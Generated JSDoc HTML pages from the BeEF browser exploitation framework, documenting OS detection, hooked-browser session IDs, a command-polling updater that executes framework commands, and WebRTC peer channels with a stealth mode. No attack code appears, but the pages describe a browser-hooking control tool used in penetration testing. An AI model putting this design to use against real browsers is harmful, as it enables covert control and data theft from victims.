<dt>
Type
</dt>
<dd>
<span class="param-type">boolean</span>
</dd>
</dl>
<h4 class="name" id=".isOsxSnowLeopard"><span class="type-signature">(static) </span>isOsxSnowLeopard<span class="signature">()</span><span class="type-signature"> → {boolean}</span></h4>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="os.js.html">os.js</a>, <a href="os.js.html#line166">line 166</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">boolean</span>
</dd>
</dl>
<h4 class="name" id=".isOsxYosemite"><span class="type-signature">(static) </span>isOsxYosemite<span class="signature">()</span><span class="type-signature"> → {boolean}</span></h4>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="os.js.html">os.js</a>, <a href="os.js.html#line154">line 154</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">boolean</span>
</dd>
</dl>
<h4 class="name" id=".isQNX"><span class="type-signature">(static) </span>isQNX<span class="signature">()</span><span class="type-signature"> → {boolean}</span></h4>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="os.js.html">os.js</a>, <a href="os.js.html#line226">line 226</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">boolean</span>
</dd>
</dl>
<h4 class="name" id=".isSunOS"><span class="type-signature">(static) </span>isSunOS<span class="signature">()</span><span class="type-signature"> → {boolean}</span></h4>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="os.js.html">os.js</a>, <a href="os.js.html#line136">line 136</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">boolean</span>
</dd>
</dl>
<h4 class="name" id=".isWebOS"><span class="type-signature">(static) </span>isWebOS<span class="signature">()</span><span class="type-signature"> → {boolean}</span></h4>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="os.js.html">os.js</a>, <a href="os.js.html#line220">line 220</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">boolean</span>
</dd>
</dl>
<h4 class="name" id=".isWin7"><span class="type-signature">(static) </span>isWin7<span class="signature">()</span><span class="type-signature"> → {boolean}</span></h4>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="os.js.html">os.js</a>, <a href="os.js.html#line106">line 106</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">boolean</span>
</dd>
</dl>
<h4 class="name" id=".isWin8"><span class="type-signature">(static) </span>isWin8<span class="signature">()</span><span class="type-signature"> → {boolean}</span></h4>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="os.js.html">os.js</a>, <a href="os.js.html#line112">line 112</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">boolean</span>
</dd>
</dl>
<h4 class="name" id=".isWin10"><span class="type-signature">(static) </span>isWin10<span class="signature">()</span><span class="type-signature"> → {boolean}</span></h4>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="os.js.html">os.js</a>, <a href="os.js.html#line124">line 124</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">boolean</span>
</dd>
</dl>
<h4 class="name" id=".isWin81"><span class="type-signature">(static) </span>isWin81<span class="signature">()</span><span class="type-signature"> → {boolean}</span></h4>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="os.js.html">os.js</a>, <a href="os.js.html#line118">line 118</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">boolean</span>
</dd>
</dl>
<h4 class="name" id=".isWin95"><span class="type-signature">(static) </span>isWin95<span class="signature">()</span><span class="type-signature"> → {boolean}</span></h4>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="os.js.html">os.js</a>, <a href="os.js.html#line52">line 52</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">boolean</span>
</dd>
</dl>
<h4 class="name" id=".isWin98"><span class="type-signature">(static) </span>isWin98<span class="signature">()</span><span class="type-signature"> → {boolean}</span></h4>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="os.js.html">os.js</a>, <a href="os.js.html#line64">line 64</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">boolean</span>
</dd>
</dl>
<h4 class="name" id=".isWin311"><span class="type-signature">(static) </span>isWin311<span class="signature">()</span><span class="type-signature"> → {boolean}</span></h4>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="os.js.html">os.js</a>, <a href="os.js.html#line40">line 40</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">boolean</span>
</dd>
</dl>
<h4 class="name" id=".isWin2000"><span class="type-signature">(static) </span>isWin2000<span class="signature">()</span><span class="type-signature"> → {boolean}</span></h4>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="os.js.html">os.js</a>, <a href="os.js.html#line76">line 76</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">boolean</span>
</dd>
</dl>
<h4 class="name" id=".isWin2000SP1"><span class="type-signature">(static) </span>isWin2000SP1<span class="signature">()</span><span class="type-signature"> → {boolean}</span></h4>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="os.js.html">os.js</a>, <a href="os.js.html#line82">line 82</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">boolean</span>
</dd>
</dl>
<h4 class="name" id=".isWinCE"><span class="type-signature">(static) </span>isWinCE<span class="signature">()</span><span class="type-signature"> → {boolean}</span></h4>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="os.js.html">os.js</a>, <a href="os.js.html#line58">line 58</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">boolean</span>
</dd>
</dl>
<h4 class="name" id=".isWindows"><span class="type-signature">(static) </span>isWindows<span class="signature">()</span><span class="type-signature"> → {boolean}</span></h4>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="os.js.html">os.js</a>, <a href="os.js.html#line244">line 244</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">boolean</span>
</dd>
</dl>
<h4 class="name" id=".isWinME"><span class="type-signature">(static) </span>isWinME<span class="signature">()</span><span class="type-signature"> → {boolean}</span></h4>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="os.js.html">os.js</a>, <a href="os.js.html#line70">line 70</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">boolean</span>
</dd>
</dl>
<h4 class="name" id=".isWinNT4"><span class="type-signature">(static) </span>isWinNT4<span class="signature">()</span><span class="type-signature"> → {boolean}</span></h4>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="os.js.html">os.js</a>, <a href="os.js.html#line46">line 46</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">boolean</span>
</dd>
</dl>
<h4 class="name" id=".isWinPhone"><span class="type-signature">(static) </span>isWinPhone<span class="signature">()</span><span class="type-signature"> → {boolean}</span></h4>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="os.js.html">os.js</a>, <a href="os.js.html#line178">line 178</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">boolean</span>
</dd>
</dl>
<h4 class="name" id=".isWinServer2003"><span class="type-signature">(static) </span>isWinServer2003<span class="signature">()</span><span class="type-signature"> → {boolean}</span></h4>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="os.js.html">os.js</a>, <a href="os.js.html#line94">line 94</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">boolean</span>
</dd>
</dl>
<h4 class="name" id=".isWinVista"><span class="type-signature">(static) </span>isWinVista<span class="signature">()</span><span class="type-signature"> → {boolean}</span></h4>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="os.js.html">os.js</a>, <a href="os.js.html#line100">line 100</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">boolean</span>
</dd>
</dl>
<h4 class="name" id=".isWinXP"><span class="type-signature">(static) </span>isWinXP<span class="signature">()</span><span class="type-signature"> → {boolean}</span></h4>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="os.js.html">os.js</a>, <a href="os.js.html#line88">line 88</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">boolean</span>
</dd>
</dl>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html> |
HTML | beef/docs/beef.session.html | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Namespace: session</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Namespace: session</h1>
<section>
<header>
<h2>session</h2>
</header>
<article>
<div class="container-overview">
<div class="description"><p>Provides basic session functions.</p></div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="session.js.html">session.js</a>, <a href="session.js.html#line7">line 7</a>
</li></ul></dd>
</dl>
</div>
<h3 class="subsection-title">Methods</h3>
<h4 class="name" id=".gen_hook_session_id"><span class="type-signature">(static) </span>gen_hook_session_id<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Generates a random string using the chars in hook_session_id_chars.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="session.js.html">session.js</a>, <a href="session.js.html#line60">line 60</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".get_hook_session_id"><span class="type-signature">(static) </span>get_hook_session_id<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Gets a string which will be used to identify the hooked browser session</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="session.js.html">session.js</a>, <a href="session.js.html#line23">line 23</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".set_hook_session_id"><span class="type-signature">(static) </span>set_hook_session_id<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Sets a string which will be used to identify the hooked browser session</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="session.js.html">session.js</a>, <a href="session.js.html#line48">line 48</a>
</li></ul></dd>
</dl>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html> |
HTML | beef/docs/beef.timeout.html | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Namespace: timeout</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Namespace: timeout</h1>
<section>
<header>
<h2>timeout</h2>
</header>
<article>
<div class="container-overview">
<div class="description"><p>Sometimes there are timing issues and looks like beef_init
is not called at all (always in cross-origin situations,
for example calling the hook with jquery getScript,
or sometimes with event handler injections).</p>
<p>To fix this, we call again beef_init after 1 second.
Cheers to John Wilander that discussed this bug with me at OWASP AppSec Research Greece
antisnatchor</p></div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="timeout.js.html">timeout.js</a>, <a href="timeout.js.html#line7">line 7</a>
</li></ul></dd>
</dl>
</div>
<h3 class="subsection-title">Methods</h3>
<h4 class="name" id=".setTimeout"><span class="type-signature">(static) </span>setTimeout<span class="signature">()</span><span class="type-signature"></span></h4>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="timeout.js.html">timeout.js</a>, <a href="timeout.js.html#line19">line 19</a>
</li></ul></dd>
</dl>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html> |
HTML | beef/docs/beef.updater.html | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Namespace: updater</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Namespace: updater</h1>
<section>
<header>
<h2>updater</h2>
</header>
<article>
<div class="container-overview">
<div class="description"><p>Object in charge of getting new commands from the BeEF framework and execute them.
The XHR-polling channel is managed here. If WebSockets are enabled,
websocket.ls is used instead.</p></div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="updater.js.html">updater.js</a>, <a href="updater.js.html#line7">line 7</a>
</li></ul></dd>
</dl>
</div>
<h3 class="subsection-title">Members</h3>
<h4 class="name" id=".beefhook"><span class="type-signature">(static) </span>beefhook<span class="type-signature"></span></h4>
<div class="description">
<p>Hook session name.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="updater.js.html">updater.js</a>, <a href="updater.js.html#line19">line 19</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".lock"><span class="type-signature">(static) </span>lock<span class="type-signature"></span></h4>
<div class="description">
<p>A lock.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="updater.js.html">updater.js</a>, <a href="updater.js.html#line22">line 22</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".objects"><span class="type-signature">(static) </span>objects<span class="type-signature"></span></h4>
<div class="description">
<p>An object containing all values to be registered and sent by the updater.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="updater.js.html">updater.js</a>, <a href="updater.js.html#line25">line 25</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".xhr_poll_timeout"><span class="type-signature">(static) </span>xhr_poll_timeout<span class="type-signature"></span></h4>
<div class="description">
<p>XHR-polling timeout.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="updater.js.html">updater.js</a>, <a href="updater.js.html#line16">line 16</a>
</li></ul></dd>
</dl>
<h3 class="subsection-title">Methods</h3>
<h4 class="name" id=".execute_commands"><span class="type-signature">(static) </span>execute_commands<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Executes the received commands, if any.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="updater.js.html">updater.js</a>, <a href="updater.js.html#line75">line 75</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".get_commands"><span class="type-signature">(static) </span>get_commands<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Gets new commands from the framework.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="updater.js.html">updater.js</a>, <a href="updater.js.html#line58">line 58</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".regObject"><span class="type-signature">(static) </span>regObject<span class="signature">(key, value)</span><span class="type-signature"></span></h4>
<div class="description">
<p>Registers an object to always send when requesting new commands to the framework.</p>
</div>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>key</code></td>
<td class="type">
<span class="param-type">String</span>
</td>
<td class="description last"><p>the name of the object.</p></td>
</tr>
<tr>
<td class="name"><code>value</code></td>
<td class="type">
<span class="param-type">String</span>
</td>
<td class="description last"><p>the value of that object.</p></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="updater.js.html">updater.js</a>, <a href="updater.js.html#line34">line 34</a>
</li></ul></dd>
</dl>
<h5>Example</h5>
<pre class="prettyprint"><code>beef.updater.regObject('java_enabled', 'true');</code></pre>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html> |
HTML | beef/docs/beef.webrtc.html | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Namespace: webrtc</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Namespace: webrtc</h1>
<section>
<header>
<h2>webrtc</h2>
</header>
<article>
<div class="container-overview">
<div class="description"><p>Manage the WebRTC peer to peer communication channels.
This objects contains all the necessary client-side WebRTC components,
allowing browsers to use WebRTC to communicate with each other.
To provide signaling, the WebRTC extension sets up custom listeners.
/rtcsignal - for sending RTC signalling information between peers
/rtcmessage - for client-side rtc messages to be submitted back into beef and logged.</p>
<p>To ensure signaling gets back to the peers, the hook.js dynamic construction also includes
the signalling.</p>
<p>This is all mostly a Proof of Concept</p></div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="webrtc.js.html">webrtc.js</a>, <a href="webrtc.js.html#line8">line 8</a>
</li></ul></dd>
</dl>
</div>
<h3 class="subsection-title">Members</h3>
<h4 class="name" id=".beefrtcs"><span class="type-signature">(static) </span>beefrtcs<span class="type-signature"></span></h4>
<div class="description">
<p>To handle multiple peers - we need to have a hash of Beefwebrtc objects. The key is the peer id.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="webrtc.js.html">webrtc.js</a>, <a href="webrtc.js.html#line27">line 27</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".globalrtc"><span class="type-signature">(static) </span>globalrtc<span class="type-signature"></span></h4>
<div class="description">
<p>To handle multiple Peers - we have to have a global hash of RTCPeerConnection objects
these objects persist outside of everything else. The key is the peer id.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="webrtc.js.html">webrtc.js</a>, <a href="webrtc.js.html#line33">line 33</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".rtcrecvchan"><span class="type-signature">(static) </span>rtcrecvchan<span class="type-signature"></span></h4>
<div class="description">
<p>To handle multiple event channels - we need to have a global hash of these. The key is the peer id</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="webrtc.js.html">webrtc.js</a>, <a href="webrtc.js.html#line45">line 45</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".rtcstealth"><span class="type-signature">(static) </span>rtcstealth<span class="type-signature"></span></h4>
<div class="description">
<p>stealth should only be initiated from one peer - this global variable will contain:
false - i.e not stealthed; or
<peerid> - i.e. the id of the browser which initiated stealth mode</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="webrtc.js.html">webrtc.js</a>, <a href="webrtc.js.html#line40">line 40</a>
</li></ul></dd>
</dl>
<h3 class="subsection-title">Methods</h3>
<h4 class="name" id=".Beefwebrtc"><span class="type-signature">(static) </span>Beefwebrtc<span class="signature">(initiator, peer, turnjson, stunservers, verbparam)</span><span class="type-signature"></span></h4>
<div class="description">
<p>Beefwebrtc object - wraps everything together for a peer connection
One of these per peer connection, and will be stored in the beefrtc global hash</p>
</div>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>initiator</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
<tr>
<td class="name"><code>peer</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
<tr>
<td class="name"><code>turnjson</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
<tr>
<td class="name"><code>stunservers</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
<tr>
<td class="name"><code>verbparam</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="webrtc.js.html">webrtc.js</a>, <a href="webrtc.js.html#line57">line 57</a>
</li></ul></dd>
</dl>
<h4 class="name" id="calleeStart"><span class="type-signature">(static) </span>Beefwebrtc#calleeStart<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Check for messages - which includes signaling from a calling peer - this gets kicked off in maybeStart()</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="webrtc.js.html">webrtc.js</a>, <a href="webrtc.js.html#line529">line 529</a>
</li></ul></dd>
</dl>
